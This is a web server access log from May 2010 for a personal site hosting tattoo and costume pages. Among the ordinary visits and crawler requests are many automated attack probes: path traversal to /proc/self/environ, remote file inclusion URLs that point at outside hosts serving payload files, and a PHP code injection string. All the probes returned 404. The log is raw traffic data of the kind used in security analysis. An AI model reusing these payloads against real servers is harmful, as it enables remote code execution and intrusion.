188.134.33.20 - - [06/May/2010:05:00:47 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:49 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:49 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:50 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:51 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:53 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:54 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
89.185.231.103 - - [06/May/2010:05:07:11 -0500] "GET //index2.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
65.163.88.107 - - [06/May/2010:05:07:28 -0500] "GET //index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
89.185.231.103 - - [06/May/2010:05:07:47 -0500] "GET //index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.250.255.243 - - [06/May/2010:05:13:29 -0500] "GET /logs/access_log.1239408000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.187 - - [06/May/2010:05:14:52 -0500] "GET /logs/access_log.1263340800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [06/May/2010:05:20:05 -0500] "GET /logs///index.php?option=com_joomla-visites&Itemid=&mosConfig.absolute.path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:05:20:05 -0500] "GET /logs/access_log.1272067200%20%20///index.php?option=com_joomla-visites&Itemid=&mosConfig.absolute.path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:05:20:05 -0500] "GET ///index.php?option=com_joomla-visites&Itemid=&mosConfig.absolute.path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:05:34:17 -0500] "GET /logs/access_log.1218067200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.1.240.149 - - [06/May/2010:05:37:15 -0500] "GET //admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.1.240.149 - - [06/May/2010:05:37:15 -0500] "GET /logs/access_log.1266451200//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.1.240.149 - - [06/May/2010:05:37:15 -0500] "GET /logs//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.46.13.52 - - [06/May/2010:05:37:52 -0500] "GET /logs/access_log.1267142400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.44 - - [06/May/2010:05:39:04 -0500] "GET /logs/access_log.1215129600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.44 - - [06/May/2010:05:40:25 -0500] "GET /logs/access_log.1262736000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
89.185.231.103 - - [06/May/2010:05:49:46 -0500] "GET /logs/access_log.1272067200//index2.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
89.185.231.103 - - [06/May/2010:05:49:47 -0500] "GET //index2.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.185.231.103 - - [06/May/2010:05:49:47 -0500] "GET /logs//index2.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
65.163.88.107 - - [06/May/2010:05:52:29 -0500] "GET /logs/access_log.1272067200//index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
65.163.88.107 - - [06/May/2010:05:52:29 -0500] "GET //index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
65.163.88.107 - - [06/May/2010:05:52:29 -0500] "GET /logs//index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
66.249.71.205 - - [06/May/2010:05:53:44 -0500] "GET /logs/access_log.1249257600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [06/May/2010:05:54:57 -0500] "GET /logs/access_log.1239494400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
218.38.34.19 - - [06/May/2010:05:55:43 -0500] "GET /logs//skin/sjini_flash_gray/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:05:55:43 -0500] "GET //skin/sjini_flash_gray/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:05:55:43 -0500] "GET /logs/access_log.1266537600//skin/sjini_flash_gray/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:05:57:22 -0500] "GET /logs/access_log.1266537600///write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:05:57:22 -0500] "GET ///write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:05:57:22 -0500] "GET /logs///write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
66.249.71.205 - - [06/May/2010:05:59:54 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
41.220.122.74 - - [06/May/2010:06:00:43 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://www.google.co.ke/search?hl=en&q=costumes+all+nations&revid=1117578638&ei=-Z_iS4ONFdyUONKe2eUN&sa=X&oi=revisions_inline&resnum=0&ct=broad-revision&cd=4&ved=0CGIQ1QIoAw""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:00:44 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:00:44 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:00:45 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:00:50 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:00:51 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:00:51 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:01:01 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:01:04 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:01:05 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:01:05 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:01:06 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:01:08 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:01:08 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:01:09 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:01:10 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:01:10 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:01:10 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:01:12 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:01:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
41.220.122.74 - - [06/May/2010:06:01:13 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
89.185.231.103 - - [06/May/2010:06:01:41 -0500] "GET /logs/access_log.1272067200//index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.185.231.103 - - [06/May/2010:06:01:41 -0500] "GET //index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.185.231.103 - - [06/May/2010:06:01:42 -0500] "GET /logs//index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.46.195.240 - - [06/May/2010:06:03:53 -0500] "GET /logs/access_log.1266796800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
41.220.122.74 - - [06/May/2010:06:04:27 -0500] "GET /costume/enter1.gif HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
87.250.255.243 - - [06/May/2010:06:09:42 -0500] "GET /logs/access_log.1229126400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [06/May/2010:06:10:42 -0500] "GET /?M=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
180.210.205.118 - - [06/May/2010:06:14:11 -0500] "GET //cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
180.210.205.118 - - [06/May/2010:06:14:11 -0500] "GET /logs//cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
180.210.205.118 - - [06/May/2010:06:14:11 -0500] "GET /logs/access_log.1262476800//cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
207.46.204.231 - - [06/May/2010:06:14:22 -0500] "GET /logs/access_log.1239580800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
180.210.205.118 - - [06/May/2010:06:14:48 -0500] "GET //cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
180.210.205.118 - - [06/May/2010:06:14:48 -0500] "GET /logs//cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
180.210.205.118 - - [06/May/2010:06:14:51 -0500] "GET /logs/access_log.1262476800//cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
180.210.205.118 - - [06/May/2010:06:15:02 -0500] "GET /logs/access_log.1263081600//cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:06:15:37 -0500] "GET /logs/access_log.1262476800//cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:06:15:37 -0500] "GET /logs//cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:06:15:37 -0500] "GET //cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:06:15:38 -0500] "GET /logs/access_log.1262476800//cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:06:15:38 -0500] "GET /logs//cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:06:15:38 -0500] "GET //cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:06:15:38 -0500] "GET /logs//cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:06:15:38 -0500] "GET //cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:06:15:38 -0500] "GET /logs/access_log.1262476800//cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:06:16:32 -0500] "GET /logs/access_log.1263081600//cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:06:16:33 -0500] "GET /logs/access_log.1263081600//cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
124.49.100.254 - - [06/May/2010:06:16:33 -0500] "GET /logs/access_log.1263081600//cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
67.19.33.58 - - [06/May/2010:06:21:31 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaindaloz.fr/image1.jpg?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.19.33.58 - - [06/May/2010:06:21:31 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaindaloz.fr/image1.jpg?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.19.33.58 - - [06/May/2010:06:21:31 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaindaloz.fr/image1.jpg?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.19.33.58 - - [06/May/2010:06:22:50 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaindaloz.fr/image1.jpg?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:06:23:34 -0500] "GET /tattoo/links.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.19.33.58 - - [06/May/2010:06:26:34 -0500] "GET /logs/access_log.1237852800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaindaloz.fr/image1.jpg?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.218.116.130 - - [06/May/2010:06:28:46 -0500] "GET /logs/access_log.1211932800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.195.225 - - [06/May/2010:06:28:52 -0500] "GET /logs/access_log.1238371200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.132 - - [06/May/2010:06:33:21 -0500] "GET /logs/access_log.1214870400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [06/May/2010:06:34:04 -0500] "GET /logs/access_log.1250294400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.40 - - [06/May/2010:06:38:29 -0500] "GET /logs/access_log.1221696000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
222.236.47.182 - - [06/May/2010:06:38:31 -0500] "GET /index0.php?show=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:06:38:31 -0500] "GET /logs/access_log.1270598400%20%20/index0.php?show=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:06:38:31 -0500] "GET /logs/index0.php?show=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:06:38:54 -0500] "GET /logs/index0.php?show=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:06:38:54 -0500] "GET /index0.php?show=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:06:38:54 -0500] "GET /logs/access_log.1270598400%20%20/index0.php?show=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.172.150.13 - - [06/May/2010:06:40:58 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.825"
95.110.193.26 - - [06/May/2010:06:41:03 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
193.218.152.83 - - [06/May/2010:06:41:09 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
81.31.157.143 - - [06/May/2010:06:41:18 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
62.112.222.113 - - [06/May/2010:06:41:51 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
210.50.189.221 - - [06/May/2010:06:42:30 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.250.255.243 - - [06/May/2010:06:42:56 -0500] "GET /logs/access_log.1236902400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
193.218.152.83 - - [06/May/2010:06:43:23 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
193.218.152.83 - - [06/May/2010:06:43:23 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
217.172.150.13 - - [06/May/2010:06:43:25 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.825"
217.172.150.13 - - [06/May/2010:06:43:25 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.825"
95.110.193.26 - - [06/May/2010:06:43:32 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
95.110.193.26 - - [06/May/2010:06:43:32 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
81.31.157.143 - - [06/May/2010:06:44:41 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
81.31.157.143 - - [06/May/2010:06:44:41 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
194.108.112.112 - - [06/May/2010:06:44:43 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
193.218.152.83 - - [06/May/2010:06:44:48 -0500] "GET /logs/access_log.1270598400//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
193.218.152.83 - - [06/May/2010:06:44:49 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
193.218.152.83 - - [06/May/2010:06:44:49 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
217.172.150.13 - - [06/May/2010:06:45:20 -0500] "GET /logs/access_log.1270598400//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.825"
217.172.150.13 - - [06/May/2010:06:45:20 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.825"
217.172.150.13 - - [06/May/2010:06:45:20 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.825"
95.110.193.26 - - [06/May/2010:06:45:20 -0500] "GET /logs/access_log.1270598400//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
